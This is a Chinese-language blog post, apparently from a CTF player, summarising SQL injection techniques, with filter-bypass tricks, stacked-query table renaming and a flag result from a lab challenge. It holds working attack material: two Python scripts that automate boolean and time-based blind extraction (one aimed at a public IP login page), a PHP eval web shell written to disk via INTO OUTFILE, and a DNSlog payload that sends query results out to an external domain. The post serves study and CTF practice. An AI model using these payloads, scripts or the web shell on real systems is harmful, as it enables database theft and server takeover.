<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            sql注入总结
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 7.1.1"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">sql注入总结</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2024-06-25
                        </span>
                        
                            
                                <span id="/article/4285413350/" class="leancloud_visitors" data-flag-title="sql注入总结">
                                    <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                                </span>
                            
                            
                                <span>
                                    <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/article/4285413350/"></span>
                                </span>
                              
                        
                    </p>
                    
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h1 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h1><h2 id="一-什么是注入"><a href="#一-什么是注入" class="headerlink" title="一.什么是注入"></a>一.什么是注入</h2><p>所谓SQL注入，就是通过把SQL命令插入到WEB表单提交或输入域名或页面请求的查询字符串，最终到达欺骗服务器执行恶意的SQL命令，从而进一步得到相应的数据信息。通过构造一条精巧的语句，来查询到想要得到的信息。</p>
<p><img src="/../images/sql%E6%B3%A8%E5%85%A5/1.png"></p>
<h2 id="二-常规注入步骤"><a href="#二-常规注入步骤" class="headerlink" title="二.常规注入步骤"></a>二.常规注入步骤</h2><h3 id="1-判断注入点类型"><a href="#1-判断注入点类型" class="headerlink" title="1.判断注入点类型"></a>1.判断注入点类型</h3><p>提交and 1&#x3D;1和and 1&#x3D;2，如果两个都能正常显示则为字符型注入，如果1&#x3D;2无法正常显示则为数字型注入</p>
<p>还有一种判断方法是使用2-1,看页面是否正常显示，数字型可以计算2-1所以会正常显示，字符型会报错（这种方法的优点是绕过对＝号的检查）</p>
<p>确定是字符型后需要尝试闭合查询语句，例如<code>),&#39;,&quot;</code>,可以根据报错语句闭合，然后在最后加上#或–+注释掉之后的语句，正确的闭合方式表现为：加注释之前为错误界面，加注释符之后为正确页面</p>
<h3 id="2-判断列数"><a href="#2-判断列数" class="headerlink" title="2.判断列数"></a>2.判断列数</h3><p>二分法判断列数，<code>?id=1 group by 5</code>或<code>?id=1 order by 5</code>，如果到某个数字恰好页面能正常显示，那么可以确定列数</p>
<h3 id="3-union联合注入"><a href="#3-union联合注入" class="headerlink" title="3.union联合注入"></a>3.union联合注入</h3><p>根据2拿到的列数构造查询语句（注：把id改成0、-1）<br><code>?id=-1 union select 1,2,3--+</code><br>看回显的位置，按照查库–&gt;表–&gt;列的顺序找到数据<br>(1)查库：3 -&gt;database()<br>(2)查表：3 -&gt;(group_concat(table_name) from information_schema.tables where table_schema&#x3D;database())<br>(3)查列：3 -&gt;(group_concat(column_name)) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’)<br>(4)查数据：3 -&gt;(select group_concat(username,password) from users)</p>
<p>注：最好用括号把语句括起来，提升优先级</p>
<h2 id="三-非常规注入"><a href="#三-非常规注入" class="headerlink" title="三.非常规注入"></a>三.非常规注入</h2><h3 id="1-报错注入（适用于无回显，但是报错正常回显）"><a href="#1-报错注入（适用于无回显，但是报错正常回显）" class="headerlink" title="1.报错注入（适用于无回显，但是报错正常回显）"></a>1.报错注入（适用于无回显，但是报错正常回显）</h3><p>三大常见报错注入:floor(),extractValue(),updateXml()</p>
<p>(1)extractValue()函数<br>原本用法：<code>select extractvalue(doc,&#39;/book/author/surname&#39;) from xml</code>从xml查询文件<br>利用方法：<code>select extractvalue(doc,concat(0x7e,($注入点))) from xml </code><br>0x7e是波浪号的16进制，把&#x2F;换成~引起报错<br>doc可以任意写，不影响<br>注入时只需要将注入点替换为select查询语句<br>注：这种方法最多同时显示32个字符，使用substring函数截取。substring(查询结果，从m显示，显示n个)</p>
<p>(2)updatexml()函数<br>原本用法：UPDATEXML(xml_target, xpath_expr, new_val)替换xml文档内容<br>利用方法：同上，更改path的第一个字符为~<br>其他两个参数无影响<img src="/../images/sql%E6%B3%A8%E5%85%A5/3.png"></p>
<p>(3)floor()函数<br>使用函数介绍：rand()生成一个0-1的小数，floor()小数向下取整,concat_ws()将括号内的数据用一个字段连接，as起别名，count():汇总统计数量，limit显示指定行数如limit 0,1从0行开始显示一行</p>
<p><code>select count(*),concat_ws(&#39;-&#39;,($注入点),floor(rand(0)*2)) as a from information_shcema.tables group by a;</code></p>
<p>报错原因：rand()函数进行分组group by和统计count()时可能会多次执行，导致键值key重复</p>
<h3 id="2-bool盲注（适用于无回显，不报错，但是页面能反映出真假）"><a href="#2-bool盲注（适用于无回显，不报错，但是页面能反映出真假）" class="headerlink" title="2.bool盲注（适用于无回显，不报错，但是页面能反映出真假）"></a>2.bool盲注（适用于无回显，不报错，但是页面能反映出真假）</h3><p>函数简介：ascii()转换字母为ascii码<br>原理：利用substr()截取字符串的每一个字符，转换成ascii码进行比较，如果对了则页面为true</p>
<p><img src="/../images/sql%E6%B3%A8%E5%85%A5/6.png"><br>这里使用了limit 0,1来保证每次只查询一个表的名字<br>改变substr()里的内容即可注入</p>
<p>可以看到，布尔盲注的人工查询效率很低，因此可以编写一个python脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">requests.adapters.DEFAULT_RETRIES = <span class="number">5</span></span><br><span class="line">conn = requests.session()</span><br><span class="line">conn.keep_alive = <span class="literal">False</span></span><br><span class="line">flag = <span class="string">&#x27;You are in...&#x27;</span> <span class="comment"># 根据返回页面的特征值来判断是否注入成功，先改这里！</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getName</span>(<span class="params">url</span>):</span><br><span class="line">    DBName = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;开始获取长度...&quot;</span>)</span><br><span class="line">    <span class="built_in">len</span> = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> l <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">99</span>):</span><br><span class="line">        time.sleep(<span class="number">0.06</span>)</span><br><span class="line">        payload = <span class="string">f&quot;&#x27; and length((select database()))=<span class="subst">&#123;l&#125;</span>--+&quot;</span> <span class="comment"># 获取数据库名长度,可以更改为查表名长度，字段长度等</span></span><br><span class="line">        res = conn.get(url=url+payload) <span class="comment"># 发送请求</span></span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">in</span> res.content.decode(<span class="string">&quot;utf-8&quot;</span>): <span class="comment"># 判断是否成功</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;数据库名长度为：&quot;</span>+<span class="built_in">str</span>(l))</span><br><span class="line">            <span class="built_in">len</span> = l</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;开始获取名...&quot;</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="built_in">len</span>+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            time.sleep(<span class="number">0.06</span>)</span><br><span class="line">            payload = <span class="string">f&quot;&#x27; and ascii(substr((select database()),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>--+&quot;</span> <span class="comment"># 获取数据库名,可以更改为查表名，字段名等</span></span><br><span class="line">            res = conn.get(url=url+payload)</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> res.content.decode(<span class="string">&quot;utf-8&quot;</span>): <span class="comment"># 判断是否成功</span></span><br><span class="line">                DBName += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="built_in">print</span>(DBName)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> DBName</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line"> url=<span class="string">&quot;http://127.0.0.1/sqli-labs/Less-5/?id=1&quot;</span> <span class="comment">#目标url</span></span><br><span class="line"> <span class="built_in">print</span>(getName(url)) <span class="comment">#调用函数</span></span><br></pre></td></tr></table></figure>

<h3 id="3-时间盲注（适用于页面无任何变化，页面响应时间不同）"><a href="#3-时间盲注（适用于页面无任何变化，页面响应时间不同）" class="headerlink" title="3.时间盲注（适用于页面无任何变化，页面响应时间不同）"></a>3.时间盲注（适用于页面无任何变化，页面响应时间不同）</h3><p>本质上是通过时间判断布尔的真假<br>sleep()函数，休眠<br>if(1,2,3)函数，1为条件，当条件为真2执行，否则3执行<br>payload:<code>?id=-1 || if(ascii(substr(查询语句,i,j))&gt;100,sleep(0),sleep(3))</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://210.30.97.133:10168/login&quot;</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">300</span>):</span><br><span class="line">    time.sleep(<span class="number">0.06</span>)</span><br><span class="line">    low = <span class="number">32</span></span><br><span class="line">    high = <span class="number">128</span></span><br><span class="line">    mid = (low + high) // <span class="number">2</span></span><br><span class="line">    <span class="keyword">while</span> low &lt; high:</span><br><span class="line">        payload = <span class="string">&quot;1&#x27; and if(ascii(substr((database()),&#123;i&#125;,1))&gt;&#123;mid&#125;,sleep(1),0)--+&quot;</span></span><br><span class="line">        temp = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: payload&#125;</span><br><span class="line">        start_time = time.time()</span><br><span class="line">        response = requests.post(url=url, data=temp)</span><br><span class="line">        end_time = time.time()</span><br><span class="line">        <span class="keyword">if</span> end_time - start_time &gt; <span class="number">2</span>:</span><br><span class="line">            low = mid + <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            high = mid</span><br><span class="line">        mid = (low + high) // <span class="number">2</span></span><br><span class="line">    <span class="keyword">if</span> mid == <span class="number">32</span> <span class="keyword">or</span> mid == <span class="number">127</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    flag += <span class="built_in">chr</span>(mid)</span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这个脚本使用了二分法提高查找效率</p>
<h3 id="4-文件上传"><a href="#4-文件上传" class="headerlink" title="4.文件上传"></a>4.文件上传</h3><p>前提：在sql命令行中输入<code>show variables like &#39;%secure%&#39;</code>，显示的secure_file_priv为空，则可以任意读写文件<br>一句话木马：<code>&lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt;</code><br>payload:<code>union select 1,2,&quot;&lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt;&quot; into outfile &quot;路径&quot;#</code><br>之后使用蚁剑连接</p>
<h3 id="5-dnslog注入"><a href="#5-dnslog注入" class="headerlink" title="5.dnslog注入"></a>5.dnslog注入</h3><p>前提：读写权限打开<br>load_file()函数：参数为UNC路径 -&gt; &#x2F;servername&#x2F;sharename&#x2F;filename<br>payload：<code>select load_file(//(注入点).192.0.0.1/123/1.txt)</code><br>使用<a target="_blank" rel="noopener" href="https://dnslog.org/%E5%8F%AF%E4%BB%A5%E6%8B%BF%E5%88%B0dns%E5%9F%9F%E5%90%8D%EF%BC%8C%E6%88%91%E4%BB%AC%E9%87%87%E7%94%A8%E6%B3%A8%E5%85%A5%E7%82%B9.%E5%9F%9F%E5%90%8D%E7%9A%84%E6%96%B9%E5%BC%8F%E5%8F%AF%E4%BB%A5%E5%9C%A8%E8%BF%99%E4%B8%A4%E4%B8%AA%E7%BD%91%E7%AB%99%E6%8B%BF%E5%88%B0%E6%B3%A8%E5%85%A5%E7%BB%93%E6%9E%9C">https://dnslog.org/可以拿到dns域名，我们采用注入点.域名的方式可以在这两个网站拿到注入结果</a></p>
<p><img src="/../images/sql%E6%B3%A8%E5%85%A5/7.png"></p>
<p>注入点：select database()…..</p>
<p>完整payload:?id&#x3D;1 and (select load_file(concat(“&#x2F;&#x2F;“,(注入点),”.域名&#x2F;ben.txt”))) #<br>使用concat防止双引号影响命令执行</p>
<h3 id="6-报头注入"><a href="#6-报头注入" class="headerlink" title="6.报头注入"></a>6.报头注入</h3><p>U-Agent注入</p>
<p>Referer注入</p>
<p>Cookie注入</p>
<h3 id="7-堆叠注入"><a href="#7-堆叠注入" class="headerlink" title="7.堆叠注入"></a>7.堆叠注入</h3><p>主站ez_sql 过滤了select和.<br><a target="_blank" rel="noopener" href="http://210.30.97.133:28043/?inject=1%27;show">?inject&#x3D;1’;show</a> databases;#</p>
<p>?inject&#x3D;1;show tables;#</p>
<p>?inject&#x3D;1;show columns from `1919810931114514&#96;;# 反单引号括住</p>
<p>查数据的时候由于不能用select</p>
<p>方法一：MySQL中查询语句handler：</p>
<ol>
<li><code>handler 【表名】 open;</code> &#x2F;&#x2F; 打开某个表</li>
<li><code>handler 【表名】 read first || next;</code> &#x2F;&#x2F; 读取表里第一行或者下一行的数据</li>
<li><code>handler 【表名】 close;</code> &#x2F;&#x2F; 关闭该表</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">handler `1919810931114514` open;</span><br><span class="line">handler `1919810931114514` read first;</span><br><span class="line">handler `1919810931114514` close;</span><br></pre></td></tr></table></figure>

<p><img src="/../images/sql%E6%B3%A8%E5%85%A5/9.png"></p>
<p>方法二：</p>
<ol>
<li><code>PREPARE 【自定义名】 FROM 【自定义的SQL查询语句】;</code>&#x2F;&#x2F;生成</li>
<li><code>EXECUTE 【自定义名】;//执行</code></li>
<li><code>DEALLOCATE PREPARE 【自定义名】;</code>&#x2F;&#x2F;释放</li>
</ol>
<p>由于select被过滤，concat绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PREPARE Hack_SQL from concat(&#x27;s&#x27;,&#x27;elect&#x27;, &#x27; * from `1919810931114514` &#x27;);</span><br><span class="line">EXECUTE Hack_SQL;</span><br><span class="line">DEALLOCATE PREPARE Hack_SQL;</span><br></pre></td></tr></table></figure>

<p>或者ascii编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PREPARE Hack_SQL from concat(char(115,101,108,101,99,116), &#x27; * from `1919810931114514`&#x27;);</span><br><span class="line">EXECUTE Hack_SQL;</span><br><span class="line">DEALLOCATE PREPARE Hack_SQL;#</span><br></pre></td></tr></table></figure>

<p>方法三</p>
<p>由于前端提供查询的数据库为words，但是flag在数据库1919810931114514里。并且可以猜测后台的SQL查询语句为：select * from words where id&#x3D;【你输入的id】</p>
<p>1.所以我们需要先将数据库words改成其它的数据库名<br>2.再把数据库1919810931114514改名为words<br>3.并且把（改名前）1919810931114514数据库的字段flag改名成id</p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">alter table words rename to words1;</span><br><span class="line">alter table `1919810931114514` rename to words;</span><br><span class="line">alter table words change flag id varchar(100);</span><br></pre></td></tr></table></figure>

<p>改完之后输入?inject&#x3D;1’ or 1&#x3D;1; 显示flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">array(1) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  string(42) &quot;flag&#123;590b74d2-2d4d-41f7-bb0e-137622e5043b&#125;&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="四-常见绕过"><a href="#四-常见绕过" class="headerlink" title="四.常见绕过"></a>四.常见绕过</h2><h3 id="1-过滤注释符绕过"><a href="#1-过滤注释符绕过" class="headerlink" title="1.过滤注释符绕过"></a>1.过滤注释符绕过</h3><p>(1)#	–+	%23</p>
<p>(2)手动闭合<br>select * from users WHERE id&#x3D;’1’ and  1&#x3D;1’’ LIMIT 0,1<br><code>1&#39; and  1=1&#39;</code>闭合了后面的引号<br><code>?id=1&#39;)(&#39;</code> -&gt;不能正常显示<br><code>?id=1&#39;) or (&#39;1&#39;)(&#39;</code> -&gt;因为1的存在正常显示<br><code>?id=1&#39; order by 3 or &#39;1&#39;=&#39;1</code></p>
<h3 id="2-and-or绕过"><a href="#2-and-or绕过" class="headerlink" title="2.and&#x2F;or绕过"></a>2.and&#x2F;or绕过</h3><p>(1)大小写绕过 anD<br>(2)复写过滤字段  anandd<br>(3)&amp;&amp;，||	需要url编码</p>
<p>注意information里也有or</p>
<h3 id="3-空格绕过"><a href="#3-空格绕过" class="headerlink" title="3.空格绕过"></a>3.空格绕过</h3><p>(1)”+”绕过<br>(2)%20 %0A %A0 %0C<br>(3)&#x2F;**&#x2F;<br>(4)报错注入无空格 -&gt;<code>?id=1&#39;||extractvalue(1,concat(&#39;$&#39;,(database())))||&#39;1&#39;=&#39;1</code></p>
<h3 id="4-逗号过滤"><a href="#4-逗号过滤" class="headerlink" title="4.逗号过滤"></a>4.逗号过滤</h3><p>join  …  on …</p>
<p>select u.<em>e.</em> from users u(起别名) join emails e on u.id&#x3D;e.id;<br>等价于select u.<em>,e.</em> from users u(起别名) , emails e where u.id&#x3D;e.id;</p>
<p>在判断完列数之后，union select * from (select 1)a JOIN (select 2)b JOIN (select 3)c;<br>效果与union select * from 1,2,3相同</p>
<h3 id="5-union-select绕过"><a href="#5-union-select绕过" class="headerlink" title="5.union select绕过"></a>5.union select绕过</h3><p>(1)大小写绕过<br>(2)复写绕过<br>(3)中间加&#x2F;**&#x2F;<br>(4)采用其他方法</p>
<h3 id="6-宽字节绕过"><a href="#6-宽字节绕过" class="headerlink" title="6.宽字节绕过"></a>6.宽字节绕过</h3><p>addslashes()函数让我们的引号失去作用</p>
<p>要求：数据库GBK编码<br>我们写入%df能够和(%5c)组成一个gbk编码（%df%5c），对应一个汉字</p>
<p><img src="/../images/sql%E6%B3%A8%E5%85%A5/8.png"></p>
<p>数据库会忽略掉这个汉字，从而注入</p>
<h3 id="7-注释绕过"><a href="#7-注释绕过" class="headerlink" title="7.注释绕过"></a>7.注释绕过</h3><p>&#x2F;*xxx*&#x2F;	注释<br>&#x2F;*!xxxx*&#x2F;	xxx会执行<br>&#x2F;*!90000xxxx*&#x2F;	php高于9版本才执行(没有高于9的版本，不会执行)	</p>
<p>union &#x2F;*!90000xxxx*&#x2F; select	绕过<br>database(&#x2F;*!90000xxxx*&#x2F;)	绕过</p>
<h2 id="五-tips"><a href="#五-tips" class="headerlink" title="五.tips"></a>五.tips</h2><p>当语句报错或者页面无法正常显示时，检查</p>
<p>1.加括号</p>
<p>2.加分号</p>
<p>3.数字打头的字段要加反引号</p>
<p>4.改变id&#x3D;0&#x2F;-1&#x2F;2&#x2F;3……</p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/RL02.jpg" alt="Dyinglight">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>Dyinglight
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/article/4285413350/" target="_blank">sql注入总结</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>原神,启动！
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                <div class="article-prev-next">
                    
                    
                        <a href="/article/2908473467/" class="next-prefix">» </a> 下一篇：    <a href="/article/2908473467/" title="发布于 2024-05-18 09:38">ciscn-wp</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>
    
 
        </div>
    
</div>
    <div id="footer">
    <div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 WorstOne. All Rights Reserved.</div>
</div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>ctf start！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/RL02.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user">
                        
                            <a href="https://worstone.cn" target="_blank"><span>Dyinglight</span></a>
                        
                    </div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://zhihu.com/people/worstone-29" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://weibo.com/u/5749847477" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.jpg"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/Dyinglight5" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>
    
    <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
    <script type="text/javascript" src="/js/APlayer.min.js"></script>
    <script type="text/javascript" src="/js/Meting.min.js"></script>
    <script>
        var meting_api = 'https://api.i-meto.com/meting/api?server=:server&type=:type&id=:id&auth=:auth&r=:r';
    </script>
    <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>

    <div class="wrap-right">
    <div class="wrap-right-hide">
         <div class="wrap-right-button favorites">
            <div class="iconbox" switch="false">
                <span class="iconfont icon-favorites"></span>
            </div>
            <span class="icontext">关注</span>
         </div>
        <div class="wrap-right-button search">
            <div class="iconbox">
                <span class="iconfont icon-search-menu"></span>
            </div>
            <span class="icontext">搜索</span>
        </div>
        <div class="wrap-right-button menu-button">
            <div class="iconbox">
                <span class="iconfont icon-menu"></span>
            </div>
            <span class="icontext">菜单</span>
        </div>
        <div class="wrap-right-button mode">
            <div class="light">
                <div class="iconbox">
                    <span class="iconfont icon-daymode"></span>
                </div>
                <span class="icontext">浅色模式</span>
            </div>
            <div class="dark">
                <div class="iconbox">
                    <span class="iconfont icon-nightmode-fill"></span>
                </div>
                <span class="icontext">深色模式</span>
            </div>
        </div>
        <div class="wrap-right-button bottom">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">跳至底部</span>
        </div>
    </div>
    <div class="wrap-right-show">
        <div class="wrap-right-button set">
            <div class="iconbox">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="wrap-right-button top">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
</div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "Dyinglight5",
        GitHubRepositories : "Dyinglight5.github.io",

        User             : "Dyinglight",
        UserAvatar       : "/image/sidebar/RL02.jpg",
        WebsiteStartDate : "2024-03-24",
        Home             : "https://worstone.cn",

        WebsiteTitleBlur         : "(◍´꒳`◍) Hi, Live For Code",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : {
